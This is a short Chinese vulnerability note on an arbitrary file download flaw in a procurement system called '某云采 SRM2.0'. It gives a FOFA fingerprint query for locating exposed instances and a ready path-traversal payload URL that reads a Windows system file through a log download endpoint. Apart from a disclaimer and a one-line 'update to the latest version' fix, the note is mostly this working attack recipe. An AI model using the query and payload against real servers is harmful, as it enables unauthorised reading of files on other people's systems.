文章目录
- 免责申明
- 搜索语法
- 漏洞描述
- 漏洞复现
- 修复建议
免责申明
本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任
搜索语法
fofa
icon_hash="1665918155"
漏洞描述
某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。
该系统download在接口处存在任意文件下载漏洞
漏洞复现
payload
http://ip/adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=C:\Windows\System32\drivers\etc\hosts
修复建议
更新到最新版本
